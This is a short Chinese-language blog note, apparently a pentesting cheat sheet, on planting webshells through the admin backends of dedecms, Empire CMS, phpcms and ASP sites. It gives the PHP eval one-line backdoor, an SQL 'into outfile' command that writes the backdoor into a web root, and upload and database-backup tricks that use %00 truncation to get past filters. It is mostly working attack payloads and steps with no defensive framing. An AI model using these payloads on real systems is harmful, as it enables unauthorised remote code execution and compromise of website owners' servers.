2021-07-07

															拿webshell

一、CMS拿webshell
1. 以dedecms为例:
a. 找到文件上传的位置 - 直接上传apt.php文件 - 用菜刀连接
b. 新建文件 text.php 里面写一句话木马 <?php eval($_POST['cmd']); ?> - 用菜刀连接
c. 修改模板 - 在模板里加入一句话木马 - 文件包含漏洞
二、 帝国cms后台拿WEBSHELL
1. 增加用户自定义页面功能 - 页面名称moon.php - 文件名…/…/page.html - 页面内容 <?php phpinfo();eval($_POST['cmd'])?>
三、 phpcms后台拿webshell
找到phpcms后台,超级管理员登录 - 内容 - 添加专题 - 专题导读里添加一句话木马
四、 asp拿webshell
插入asp文件拿webshell (有些插入配置文件里,但是有过滤可能会凉凉)
新建文件拿webshell
上传文件拿webshell
编辑html拿webshell
备份数据库拿webshell()
配置文件拿webshell
数据库命令拿webshell (select ‘<?php eval($_POST[cmd])?>’ into outfile ‘E:/phpStudy/PHPTutorial/WWW/www.ecshop36.com/ecshop/moon.php’)

数据库备份的时候:
可以尝试备份成1.php 如果默认后缀加.db 就备份成.php; .php%00 更改系统信息,里面是一句话木马,然后备份数据库
或者找一个数据表 插入一句话 再进行备份 备份格式是.php
上传一个一句话木马,抓包将 上传的地址改为xxx/xxx/xxx.asp ,如果不行后面%00截断 然后url decode ,最后访问该地址
<%response.write(“security test!”)%>

上一篇:文件上传漏洞全面渗透姿势总结


下一篇:webshell后门分析